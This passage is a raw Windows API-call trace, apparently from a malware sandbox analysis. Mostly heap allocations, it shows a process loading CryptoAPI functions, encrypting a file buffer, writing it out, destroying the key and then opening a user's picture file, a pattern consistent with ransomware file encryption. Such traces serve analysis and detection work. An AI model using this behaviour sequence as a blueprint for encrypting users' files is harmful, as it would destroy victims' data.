(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0090.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0090.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0090.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0090.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0090.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0090.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0090.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0090.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0090.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0090.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0090.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0090.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0090.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0090.142] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0090.142] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2670, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2670*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0090.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0090.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0090.144] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.145] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0090.145] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0090.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0090.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0090.146] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0090.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0090.146] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca778, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.147] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1744a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x17450) returned 1 [0090.148] CharLowerBuffW (in: lpsz="byte[95313]", cchLength=0xb | out: lpsz="byte[95313]") returned 0xb [0090.151] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.152] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.152] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b1460*, pdwDataLen=0x144e790*=0x1744a, dwBufLen=0x17450 | out: pbData=0x49b1460*, pdwDataLen=0x144e790*=0x17450) returned 1 [0090.152] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0090.152] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0090.152] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.154] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x17450, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0x17450, lpOverlapped=0x0) returned 1 [0090.157] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0090.157] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca250, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0090.158] CryptDestroyKey (hKey=0x41ac780) returned 1 [0090.158] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0090.158] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0090.158] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.158] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0090.158] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0090.158] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.158] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.158] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0090.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0090.158] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0090.158] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.158] FreeLibrary (hLibModule=0x756e0000) returned 1 [0090.158] CloseHandle (hObject=0x298) returned 1 [0090.159] CloseHandle (hObject=0x258) returned 1 [0090.236] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png", lpFilePart=0x0) returned 0x21 [0090.236] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rk8a.png")) returned 0x20 [0090.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0090.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0090.237] RtlAllocateHeap 